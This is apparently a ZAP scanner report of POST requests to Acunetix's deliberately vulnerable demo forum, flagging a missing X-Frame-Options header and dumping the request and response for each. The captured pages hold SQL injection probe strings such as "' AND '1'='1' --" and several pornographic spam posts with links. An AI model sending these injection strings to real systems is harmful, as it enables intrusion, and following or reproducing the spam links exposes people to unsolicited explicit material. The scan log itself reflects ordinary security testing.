<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3375 |
| Response Body - size: 3,375 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3437 |
| Response Body - size: 3,437 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3468 |
| Response Body - size: 3,468 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3357 |
| Response Body - size: 3,357 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3406 |
| Response Body - size: 3,406 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
